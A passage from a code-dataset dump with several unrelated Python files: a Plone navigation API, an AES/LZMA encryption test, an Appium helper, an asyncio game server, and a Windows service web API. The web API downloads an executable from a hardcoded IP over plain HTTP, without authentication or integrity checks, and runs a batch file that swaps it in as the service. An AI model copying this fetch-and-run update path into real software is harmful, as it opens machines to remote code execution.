wrapper.getURL(),\n 'uid': wrapper.UID,\n 'active': wrapper.review_state() != REPOSITORY_FOLDER_STATE_INACTIVE,\n 'current': context_url == wrapper.getURL(),\n 'current_tree': context_url.startswith(wrapper.getURL()),\n 'is_leafnode': None,\n 'is_subdossier': wrapper.is_subdossier,\n 'review_state': wrapper.review_state(),\n 'dossier_type': wrapper.dossier_type,\n }\n if wrapper.portal_type == 'opengever.repository.repositoryfolder':\n node['is_leafnode'] = not wrapper.has_sametype_children\n return json_compatible(node)\n\n\nclass NavigationGet(Service):\n\n def reply(self):\n navigation = Navigation(self.context, self.request)\n return navigation(expand=True)['navigation']\n", "sub_path": "opengever/api/navigation.py", "file_name": "navigation.py", "file_ext": "py", "file_size_in_byte": 8202, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "zope.component.getUtility", "line_number": 46, "usage_type": "call"}, {"api_name": "ftw.solr.interfaces.ISolrSearch", "line_number": 46, "usage_type": "argument"}, {"api_name": "opengever.base.browser.navigation.make_tree_by_url", "line_number": 68, "usage_type": "call"}, {"api_name": "Products.CMFPlone.interfaces.siteroot.IPloneSiteRoot.providedBy", "line_number": 77, "usage_type": "call"}, {"api_name": "Products.CMFPlone.interfaces.siteroot.IPloneSiteRoot", "line_number": 77, "usage_type": "name"}, {"api_name": "Acquisition.aq_parent", "line_number": 78, "usage_type": "call"}, {"api_name": "Products.CMFPlone.interfaces.siteroot.IPloneSiteRoot.providedBy", "line_number": 87, "usage_type": "call"}, {"api_name": "Products.CMFPlone.interfaces.siteroot.IPloneSiteRoot", "line_number": 87, "usage_type": "name"}, {"api_name": "Acquisition.aq_parent", "line_number": 90, "usage_type": "call"}, {"api_name": "ftw.solr.query.make_filters", "line_number": 96, "usage_type": "call"}, {"api_name": "opengever.base.solr.OGSolrDocument", "line_number": 101, "usage_type": "call"}, {"api_name": "zExceptions.BadRequest", "line_number": 106, "usage_type": "call"}, {"api_name": "ftw.solr.query.make_filters", "line_number": 121, "usage_type": "call"}, {"api_name": "ftw.solr.query.make_filters", "line_number": 130, "usage_type": "call"}, {"api_name": "ftw.solr.query.make_filters", "line_number": 131, "usage_type": "call"}, {"api_name": "opengever.base.solr.OGSolrDocument", "line_number": 140, "usage_type": "call"}, {"api_name": "zope.dottedname.resolve.resolve", "line_number": 152, "usage_type": "call"}, {"api_name": "opengever.repository.repositoryroot.IRepositoryRoot", "line_number": 166, "usage_type": "name"}, {"api_name": "zExceptions.BadRequest", "line_number": 168, "usage_type": "call"}, {"api_name": "opengever.repository.interfaces.IRepositoryFolder", "line_number": 179, "usage_type": "name"}, {"api_name": "zExceptions.BadRequest", "line_number": 190, "usage_type": "call"}, {"api_name": "plone.app.contentlisting.interfaces.IContentListingObject", "line_number": 195, "usage_type": "call"}, {"api_name": "opengever.repository.repositoryfolder.REPOSITORY_FOLDER_STATE_INACTIVE", "line_number": 204, "usage_type": "name"}, {"api_name": "plone.restapi.serializer.converters.json_compatible", "line_number": 214, "usage_type": "call"}, {"api_name": "zope.interface.implementer", "line_number": 23, "usage_type": "call"}, {"api_name": "plone.restapi.interfaces.IExpandableElement", "line_number": 23, "usage_type": "argument"}, {"api_name": "zope.component.adapter", "line_number": 24, "usage_type": "call"}, {"api_name": "zope.interface.Interface", "line_number": 24, "usage_type": "argument"}, {"api_name": "opengever.base.interfaces.IOpengeverBaseLayer", "line_number": 24, "usage_type": "argument"}, {"api_name": "plone.restapi.services.Service", "line_number": 217, "usage_type": "name"}]} +{"seq_id": "412269518", "text": "# -*- coding: utf-8 -*-\n\nimport base64\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\nfrom Crypto.Hash import SHA256\nimport pylzma\nimport os\nimport sys\nsys.path.insert(0, os.path.abspath('./encrepo'))\nimport hash_helper\nimport pack\nimport time\n\nBS = 32\nAES_KEY_SIZE = 32 #Key is 256 bit\npad = lambda s : s if len(s) % AES_KEY_SIZE == 0 else \\\n s + (AES_KEY_SIZE - len(s) % AES_KEY_SIZE) \\\n * chr(AES_KEY_SIZE - len(s) % AES_KEY_SIZE)\n\nunpad = lambda s : s if len(s) % AES_KEY_SIZE == 0 else \\\n s[:-ord(s[len(s)-1])]\n\nclass AESCipher:\n def __init__( self, key ):\n self.key = key\n\n def encrypt( self, raw ):\n raw = pad(raw)\n iv = Random.new().read( AES.block_size )\n cipher = AES.new( self.key, AES.MODE_CBC, iv )\n return base64.b64encode( iv + cipher.encrypt( raw ) )\n\n def decrypt( self, enc ):\n enc = base64.b64decode(enc)\n iv = enc[:16]\n cipher = AES.new(self.key, AES.MODE_CBC, iv )\n return unpad(cipher.decrypt( enc[16:] ))\n\nraw_info = \"\"\"awsome text goes here,\n U cannot see me,\n One good turn deserves another\"\"\"\n\nwith open('/home/xin/iprule') as input_file:\n raw_info = input_file.read()\n\nkey = 'abcdefghijklmnopqrstuvwxyz123456'\n\n\nkey = pad(key)\n\nAES_KEY = 'asdfas2\"%H:%M:%'\n\ndef test_compressed():\n print(\"key=%s length:%d\"%(key,len(key)))\n print(\"Original length of data:%d\"%len(raw_info))\n\n raw_hash = hash_helper.hash_str(raw_info)\n print(\"Original hash:%s\"%raw_hash)\n h = SHA256.new()\n h.update(raw_info)\n print(\"Original hashA:%s\"%h.hexdigest())\n\n\n compressed_info = pylzma.compress(raw_info)\n\n print(\"compressed length of data:%d\"%len(compressed_info))\n\n\n cf = AESCipher(key)\n encrypted = cf.encrypt(compressed_info)\n decrypted = cf.decrypt(encrypted)\n print(\"encrypted length of data:%d\"%len(encrypted))\n decompressed = pylzma.decompress(decrypted)\n print(\"Decrypted hash:%s\"%hash_helper.hash_str(decompressed))\n\n\n\n\ndef test_run1():\n print(\"Original length of data:%d\"%len(raw_info))\n raw_hash = hash_helper.hash_str(raw_info)\n print(\"Original hash:%s\"%raw_hash)\n\n cf = AESCipher(key)\n encrypted = cf.encrypt(raw_info)\n print(\"length of encrypted data:%d\"%len(encrypted))\n compressed_info = pylzma.compress(encrypted)\n print(\"compressed length of encrypted data:%d\"%len(compressed_info))\n\n decompressed = pylzma.decompress(compressed_info)\n decrypted = cf.decrypt(decompressed)\n print(\"Decrypted hash:%s\"%hash_helper.hash_str(decrypted))\n\n\ndef test_run2():\n info = \"the red fox jumps over the lazy dog\\n\"\n more_info = lambda i : '' if i ==0 else \\\n more_info(i-1) + 'Line {0:10d} : {1}'.format(i, info) * 100\n with open('/tmp/test.txt','w') as afile:\n afile.write(more_info(100))\n t0 = time.time()\n print(t0)\n t1 = t0\n t2 = t1\n print('{0}:....total={1:20f}, step={2:20f}'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n\ndef noautorun_test_pack_large():\n t0 = time.time()\n print(t0)\n t1 = t0\n t2 = t1\n\n print('{0}:....total={1:12f}, step={2:12f}..starting'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n\n #test_file = '/tmp/Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4'\n test_file = '/home/xin/下载/头脑特工队.Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4'\n with open(test_file) as afile:\n dgst_original = hash_helper.hash_file(afile)\n #dgst_original ='370cbba5943b5ba6ab868e9f0e098d8ccb8aa5f7396f82ebe22ac6a072c001f8'\n print(\"Original SHA256:%s\"%dgst_original)\n t2 = time.time()\n print('{0}:....total={1:12f}, step={2:12f}..dgst original'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n t1 = t2\n packed_file_name = '/tmp/Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4.pack'\n unpacked_file_name = '/tmp/Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.unpack.mp4'\n pack.pack_file(AES_KEY, test_file, packed_file_name)\n t2 = time.time()\n print('{0}:....total={1:12f}, step={2:12f}..packing..'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n t1 = t2\n pack.unpack_file(AES_KEY, packed_file_name, unpacked_file_name)\n t2 = time.time()\n print('{0}:....total={1:12f}, step={2:12f}..Unpacking..'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n t1 = t2\n with open(unpacked_file_name) as newfile:\n dgst_new = hash_helper.hash_file(newfile)\n\n\n t2 = time.time()\n print('{0}:....total={1:12f}, step={2:12f}..dgst result..'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n t1 = t2\n print(\"New SHA256:%s\"%dgst_new)\n assert dgst_original == dgst_new\n\ndef noautorun_test_pad():\n with open('/tmp/3.mp4') as afile:\n s = afile.read()\n print(hash_helper.hash_str(s))\n encrypted = pack.encrypt(AES_KEY, s)\n decrypted = pack.decrypt1(AES_KEY, encrypted)\n print(hash_helper.hash_str(decrypted))\n print(unpad(hash_helper.hash_str(decrypted)))\n\ndef split_file_writer(file_name, split_size=32):\n file_size = split_size * 2 ** 20\n sum_len = [0]\n def write_file(buf):\n sum_len[0] += len(buf)\n file_no = sum_len[0] // file_size\n new_filename = file_name if file_no==0 else file_name+'.'+('0000'+str(file_no))[-4:]\n with open(new_filename,'a') as afile:\n afile.write(buf)\n return write_file\n\n\ndef split_file_reader(file_name):\n files = [open(file_name,'r')]\n file_no = [0]\n def read_file(buf_size):\n buf = files[0].read(buf_size)\n if len(buf) == 0:\n file_no[0] += 1\n files[0].close()\n try:\n files[0] = open(file_name+'.'+('0000'+str(file_no[0]))[-4:])\n return read_file(buf_size)\n except IOError:\n return ''\n else:\n return buf\n return read_file\n\ndef tester_split():\n original_file_name = '/home/xin/下载/头脑特工队.Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4'\n splited_file_name = '/tmp/new/inside.out.mp4'\n recombined_file_name = '/tmp/inside.out.recombined.mp4'\n writer = split_file_writer(splited_file_name)\n\n with open(original_file_name) as afile:\n buf = afile.read(65536)\n while len(buf) >0 :\n writer(buf)\n buf = afile.read(65536)\n\ndef tester_combine():\n original_file_name = '/home/xin/下载/头脑特工队.Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4'\n splited_file_name = '/tmp/new/inside.out.mp4'\n recombined_file_name = '/tmp/inside.out.recombined.mp4'\n reader = split_file_reader(splited_file_name)\n with open(recombined_file_name,'w') as afile:\n buf = reader(65536)\n while len(buf)>0:\n afile.write(buf)\n buf = reader(65536)\n\n dgst1 = hash_helper.hash_file(open(original_file_name))\n dgst2 = hash_helper.hash_file(open(recombined_file_name))\n\n assert dgst1 == dgst2\n\n\ntester_combine()\n", "sub_path": "encrypted_file_repo/test/test_run.py", "file_name": "test_run.py", "file_ext": "py", "file_size_in_byte": 7461, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.insert", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "Crypto.Random.new", "line_number": 30, "usage_type": "call"}, {"api_name": "Crypto.Random", "line_number": 30, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.block_size", "line_number": 30, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.AES", "line_number": 30, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 31, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 31, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 31, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 32, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 35, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 37, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 37, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 37, "usage_type": "attribute"}, {"api_name": "hash_helper.hash_str", "line_number": 58, "usage_type": "call"}, {"api_name": "Crypto.Hash.SHA256.new", "line_number": 60, "usage_type": "call"}, {"api_name": "Crypto.Hash.SHA256", "line_number": 60, "usage_type": "name"}, {"api_name": "pylzma.compress", "line_number": 65, "usage_type": "call"}, {"api_name": "pylzma.decompress", "line_number": 74, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 75, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 82, "usage_type": "call"}, {"api_name": "pylzma.compress", "line_number": 88, "usage_type": "call"}, {"api_name": "pylzma.decompress", "line_number": 91, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 93, "usage_type": "call"}, {"api_name": "time.time", "line_number": 102, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 107, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 107, "usage_type": "call"}, {"api_name": "time.time", "line_number": 112, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 118, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 118, "usage_type": "call"}, {"api_name": "hash_helper.hash_file", "line_number": 125, "usage_type": "call"}, {"api_name": "time.time", "line_number": 128, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 130, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 130, "usage_type": "call"}, {"api_name": "pack.pack_file", "line_number": 136, "usage_type": "call"}, {"api_name": "time.time", "line_number": 137, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 139, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 139, "usage_type": "call"}, {"api_name": "pack.unpack_file", "line_number": 143, "usage_type": "call"}, {"api_name": "time.time", "line_number": 144, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 146, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 146, "usage_type": "call"}, {"api_name": "hash_helper.hash_file", "line_number": 151, "usage_type": "call"}, {"api_name": "time.time", "line_number": 154, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 156, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 156, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 166, "usage_type": "call"}, {"api_name": "pack.encrypt", "line_number": 167, "usage_type": "call"}, {"api_name": "pack.decrypt1", "line_number": 168, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 169, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 170, "usage_type": "call"}, {"api_name": "hash_helper.hash_file", "line_number": 224, "usage_type": "call"}, {"api_name": "hash_helper.hash_file", "line_number": 225, "usage_type": "call"}]} +{"seq_id": "340990095", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom commons import logger\nimport os\n\nimport yaml\nfrom appium import webdriver\n\nlogger = logger.Logger().getLogger()\n\n\ndef appium_desired():\n dirname = os.path.dirname(os.path.dirname(__file__))\n filename = os.path.join(dirname, 'config/kyb_caps.yaml')\n with open(filename, 'r', encoding='utf-8') as file:\n data = yaml.load(file)\n\n base_dir = os.path.dirname(os.path.dirname(__file__))\n app_path = os.path.join(base_dir, 'app', data['appname'])\n desired_caps = {\n \"platformName\": data['platformName'],\n \"platformVersion\": data['platformVersion'],\n\n \"deviceName\": data['deviceName'],\n \"udid\": data['udid'],\n\n \"app\": app_path,\n \"appPackage\": data['appPackage'],\n \"appActivity\": data['appActivity'],\n\n \"automationName\": data['automationName'],\n \"noReset\": data['noReset'],\n\n \"unicodeKeyboard\": data['unicodeKeyboard'],\n \"resetKeyboard\": data['resetKeyboard']\n }\n logger.info('start app......')\n\n driver = webdriver.Remote('http://' + str(data['ip']) + ':' + str(data['port']) + '/wd/hub', desired_caps)\n driver.implicitly_wait(3)\n return driver\n\n\nif __name__ == '__main__':\n appium_desired()\n", "sub_path": "commons/desired_caps.py", "file_name": "desired_caps.py", "file_ext": "py", "file_size_in_byte": 1255, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "commons.logger", "line_number": 9, "usage_type": "name"}, {"api_name": "commons.logger.Logger", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "commons.logger.info", "line_number": 37, "usage_type": "call"}, {"api_name": "commons.logger", "line_number": 37, "usage_type": "name"}, {"api_name": "appium.webdriver.Remote", "line_number": 39, "usage_type": "call"}, {"api_name": "appium.webdriver", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "200320471", "text": "#!/usr/bin/python3\n\nimport spaceking.net as net\nimport spaceking.common as com\nimport spaceking.log as log\nimport spaceking.event as ev\n\nimport shutil\nimport atexit\nimport os\nimport tempfile\nimport asyncio\nimport socket\n\nEVT_SERVER_RUNNING = 15000\nEVT_SERVER_QUIT = 15001\nEVT_SERVER_CONNECTED = 15002\nEVT_SERVER_DISCONNECTED = 15003\nEVT_SERVER_FAILED_JOIN = 15004\nEVT_SERVER_FAILED_CLIENT = 15005\nEVT_SERVER_NEW_CLIENT = 15006\nEVT_SERVER_DISCONNECTED_CLIENT = 15007\n\n\nclass ServerClient:\n\n __slots__ = [\"uid\", \"addr\", \"reader\", \"writer\"]\n\n def __init__(self, uid, addr, reader, writer):\n self.uid = uid\n self.addr = addr\n self.reader = reader\n self.writer = writer\n\n def __str__(self):\n return \"client: uid={0}, addr={1}\".format(self.uid, self.addr)\n\n\nclass ServerConnection(net.Connection):\n \"\"\"Game server\"\"\"\n\n MAX_CLIENTS = 16\n\n def __init__(self,\n bind_to=None,\n loop=asyncio.get_event_loop(),\n socket_type=\"tcp\"):\n \"\"\"NOTE: with socket_type = unix, the bind_to needs to be None or a\n temporary directory. This directory is removed on exit.\"\"\"\n super().__init__()\n self.clients = []\n self.server = None\n self._uid_cursor = 0 # ringbuf cur.\n self.loop = loop\n\n self.proto_map = {\n \"tcp\": self._start_tcp_server,\n \"unix\": self._start_unix_server\n }\n if socket_type not in self.proto_map:\n raise ValueError(\"socket type: {0} not valid.\".format(socket_type))\n self.socket_type = socket_type\n\n if bind_to is None:\n if socket_type == \"unix\":\n self.bind_to = self._unique_unix_socket_path()\n else:\n self.bind_to = \"localhost\"\n else:\n self.bind_to = bind_to\n\n self.register_handler(net.EVT_PACKET_SEND, self.handle_packet_send)\n\n def _unique_unix_socket_path(self):\n directory = tempfile.mkdtemp(prefix=\"sock-serv\", dir=com.CONFIG_HOME)\n sock_name = \"socket\"\n return os.path.join(directory, \"socket\")\n\n def _create_client(self, uid, *args, **kwargs):\n client = ServerClient(uid, *args, **kwargs)\n self._add_client(client)\n\n def create_evt(pkt):\n return net.NetEvent(net.EVT_PACKET_RECV, uid, pkt)\n\n # Server listens for client packets\n coro = self.listen_packets(client.reader, create_evt)\n task = asyncio.Task(coro, loop=self.loop)\n # Cleanup on socket death\n task.add_done_callback(lambda t: self.disconnect_client(client, t))\n return client\n\n def _add_client(self, client):\n self.clients.append(client)\n\n def _remove_client_by_uid(self, uid):\n for idx, client in enumerate(self.clients):\n if idx == uid:\n del self.clients[idx]\n\n def _get_client_by_uid(self, uid):\n for idx, client in enumerate(self.clients):\n if client.uid == uid:\n return self.clients[idx]\n\n def _next_uid(self):\n # Spawn new unique client ID. ring used for simplicity.\n uid = self._uid_cursor\n self._uid_cursor = (uid + 1) % ServerConnection.MAX_CLIENTS\n return uid\n\n def get_client_count(self):\n return len(self.clients)\n\n @asyncio.coroutine\n def accept_client(self, reader, writer):\n uid = self._next_uid()\n\n remote_addr = self._get_addr(writer)\n if remote_addr is None:\n log.warn(\"Error on client uid={0} connect.\".format(uid))\n return\n\n client = self._create_client(uid, remote_addr, reader, writer)\n\n yield from self.notify(net.NetEvent(EVT_SERVER_NEW_CLIENT, uid))\n log.info(\"{0} connected.\".format(client))\n\n @asyncio.coroutine\n def handle_packet_send(self, event):\n client = self._get_client_by_uid(event.uid)\n if client is None:\n return\n try:\n yield from self.send_packets(client.writer, event.pkt)\n except socket.error as err:\n log.debug(\"Error while sending packets to {0}\".format(client))\n self.disconnect_client(client)\n return\n\n def disconnect_client_by_uid(self, uid):\n # task of disconnect notification is returned\n self._remove_client_by_uid(uid)\n event = net.NetEvent(EVT_SERVER_DISCONNECTED_CLIENT, uid)\n\n task = asyncio.Task(self.notify(event), loop=self.loop)\n return task\n\n def disconnect_client(self, client, client_task=None):\n if client_task:\n try:\n result = client_task.result()\n except Exception as err:\n msg = \"{0} completed with an error. {1}\".format(client, err)\n log.debug(msg)\n\n log.info(\"{0} disconnected.\".format(client))\n self.disconnect_client_by_uid(client.uid)\n\n def _start_server(self, coro):\n try:\n self.server = self.loop.run_until_complete(coro)\n except Exception as err:\n log.error(\"server connection crashed on startup\")\n raise err\n\n def _start_tcp_server(self):\n self._start_server(asyncio.start_server(self.accept_client,\n loop=self.loop,\n host=self.bind_to,\n port=net.SERVER_PORT,\n reuse_address=True))\n\n def _start_unix_server(self):\n def socket_cleanup():\n shutil.rmtree(os.path.dirname(self.bind_to))\n log.debug(\"UNIX socket {0} cleaned up.\".format(self.bind_to))\n\n atexit.register(socket_cleanup)\n self._start_server(asyncio.start_unix_server(self.accept_client,\n path=self.bind_to,\n loop=self.loop))\n\n def start_server(self):\n self.proto_map[self.socket_type]()\n\n log.info(\"spaceking server listening.\")\n self.notify(net.NetEvent(EVT_SERVER_RUNNING, None))\n\n def quit(self):\n log.debug(\"spaceking server connection shutting down.\")\n if self.server:\n self.server.close()\n self.server = None\n self.notify(net.NetEvent(EVT_SERVER_QUIT, None))\n else:\n log.debug(\"Calling quit on a dead server\")\n", "sub_path": "spaceking/server/net.py", "file_name": "net.py", "file_ext": "py", "file_size_in_byte": 6412, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "spaceking.net.Connection", "line_number": 39, "usage_type": "attribute"}, {"api_name": "spaceking.net", "line_number": 39, "usage_type": "name"}, {"api_name": "asyncio.get_event_loop", "line_number": 46, "usage_type": "call"}, {"api_name": "spaceking.net.EVT_PACKET_SEND", "line_number": 72, "usage_type": "attribute"}, {"api_name": "spaceking.net", "line_number": 72, "usage_type": "name"}, {"api_name": "tempfile.mkdtemp", "line_number": 75, "usage_type": "call"}, {"api_name": "spaceking.common.CONFIG_HOME", "line_number": 75, "usage_type": "attribute"}, {"api_name": "spaceking.common", "line_number": 75, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "spaceking.net.NetEvent", "line_number": 84, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 84, "usage_type": "name"}, {"api_name": "spaceking.net.EVT_PACKET_RECV", "line_number": 84, "usage_type": "attribute"}, {"api_name": "asyncio.Task", "line_number": 88, "usage_type": "call"}, {"api_name": "spaceking.log.warn", "line_number": 121, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 121, "usage_type": "name"}, {"api_name": "spaceking.net.NetEvent", "line_number": 126, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 126, "usage_type": "name"}, {"api_name": "spaceking.log.info", "line_number": 127, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 127, "usage_type": "name"}, {"api_name": "asyncio.coroutine", "line_number": 115, "usage_type": "attribute"}, {"api_name": "socket.error", "line_number": 136, "usage_type": "attribute"}, {"api_name": "spaceking.log.debug", "line_number": 137, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 137, "usage_type": "name"}, {"api_name": "asyncio.coroutine", "line_number": 129, "usage_type": "attribute"}, {"api_name": "spaceking.net.NetEvent", "line_number": 144, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 144, "usage_type": "name"}, {"api_name": "asyncio.Task", "line_number": 146, "usage_type": "call"}, {"api_name": "spaceking.log.debug", "line_number": 155, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 155, "usage_type": "name"}, {"api_name": "spaceking.log.info", "line_number": 157, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 157, "usage_type": "name"}, {"api_name": "spaceking.log.error", "line_number": 164, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 164, "usage_type": "name"}, {"api_name": "asyncio.start_server", "line_number": 168, "usage_type": "call"}, {"api_name": "spaceking.net.SERVER_PORT", "line_number": 171, "usage_type": "attribute"}, {"api_name": "spaceking.net", "line_number": 171, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "attribute"}, {"api_name": "spaceking.log.debug", "line_number": 177, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 177, "usage_type": "name"}, {"api_name": "atexit.register", "line_number": 179, "usage_type": "call"}, {"api_name": "asyncio.start_unix_server", "line_number": 180, "usage_type": "call"}, {"api_name": "spaceking.log.info", "line_number": 187, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 187, "usage_type": "name"}, {"api_name": "spaceking.net.NetEvent", "line_number": 188, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 188, "usage_type": "name"}, {"api_name": "spaceking.log.debug", "line_number": 191, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 191, "usage_type": "name"}, {"api_name": "spaceking.net.NetEvent", "line_number": 195, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 195, "usage_type": "name"}, {"api_name": "spaceking.log.debug", "line_number": 197, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 197, "usage_type": "name"}]} +{"seq_id": "194247979", "text": "# coding:utf-8\n\nimport logging\nimport psutil \nimport time\nimport json\nimport winreg\nimport requests\nimport os\nimport subprocess\nimport globalvar as gl\nfrom urllib.parse import parse_qs\n\n\nlogging.basicConfig(level=logging.DEBUG,format=' %(asctime)s - %(levelname)s - %(message)s')\n#logging.disable(logging.CRITICAL) # 加这句话,就是log全部禁止,不加,就可以log打印了\n\n\n\n# 定义函数,两个参数,都是python本身定义的,默认就行了。\ndef application(environ, start_response):\n \n recordLog('start in webapi')\n # 定义文件请求的类型和当前请求成功的code\n try:\n start_response('200 OK', [('Content-Type', 'application/json;charset=utf-8')])\n d = parse_qs(environ['QUERY_STRING'])\n recordLog(environ['QUERY_STRING'])\n key = d.get('key', [''])[0] # 返回第一个age值.\n recordLog(key)\n except Exception as err:\n recordLog('web err!')\n recordLog(str(err))\n \n \n\n # 获取服务器的硬件运行信息\n if key=='getinfo':\n info=sysInfo()\n json_str = json.dumps(info,ensure_ascii=False,indent=4)\n recordLog('record getinfo')\n recordLog(json.dumps(json_str))\n return [json_str.encode('utf-8')]\n \n # 主动触发服务器下载最新版的热更新\n elif key=='download':\n info = {\"status\": \"download\"}\n try:\n res =requests.get(r'http://47.75.120.191:83/PCInfoService.exe',timeout=30)\n except Exception as err:\n info = {\"status\":str(err)}\n recordLog(str(err))\n\n down=os.path.join(getPath(),'PCInfoService.exe')\n\n try:\n downloadFile = open(down,'wb')\n for chunk in res.iter_content(100000):\n downloadFile.write(chunk)\n #recordLog(os.path.getsize(downloadFile))\n downloadFile.close()\n info = {\"status\":\"download finish\"}\n\n recordLog(\"download finish\")\n \n WriteRestartCmd()\n recordLog(\"update Start\")\n recordLog(\"shutdown\")\n \n except Exception as err:\n recordLog(str(err))\n info = {\"status\":str(err)}\n \n finally:\n return [json_str.encode('utf-8')]\n \n else:\n logging.debug('Noget')\n info = {\"status\": \"none\"}\n json_str = json.dumps(info,ensure_ascii=False,indent=4)\n return [json_str.encode('utf-8')]\n \n#编写bat脚本,删除旧程序,运行新程序\ndef WriteRestartCmd():\n os.chdir(getPath())\n b = open(\"upgrade.bat\",'w')\n TempList = \"@echo off\\n\"; #关闭bat脚本的输出\n TempList += \"if not exist pcinfoservice.exe exit \\n\"; #新文件不存在,退出脚本执行\n TempList += \"sc stop pcinfo \\n\" \n TempList += \"ping /n 5 127.1>nul \\n\" #5秒后删除旧程序(3秒后程序已运行结束,不延时的话,会提示被占用,无法删除)\n TempList += \"del PCInfo.exe /q \\n\"\n TempList += \"ren PCInfoService.exe PCInfo.exe \\n\"\n TempList += \"pcinfo.exe install \\n\"\n TempList += \"sc start pcinfo \\n\"\n TempList += \"sc config pcinfo start= auto\" \n b.write(TempList)\n b.close()\n subprocess.Popen(\"upgrade.bat\")\n\n\ndef recordLog(strmsg): #把strmsg写入日志\n \n os.chdir(getPath())\n try:\n logFile = open(r'web.log','a')\n logFile.write(get_time_stamp()+' ') #写入日志\n logFile.write(strmsg+'\\n')\n except Exception as err:\n logFile.write(get_time_stamp()+' ') #写入日志\n logFile.write('write web.log err!\\n')\n pass\n finally:\n logFile.close()\n return\n\ndef sysInfo():\n info={}\n \n line={}\n try:\n line.setdefault('CPU核心',str(psutil.cpu_count()))\n 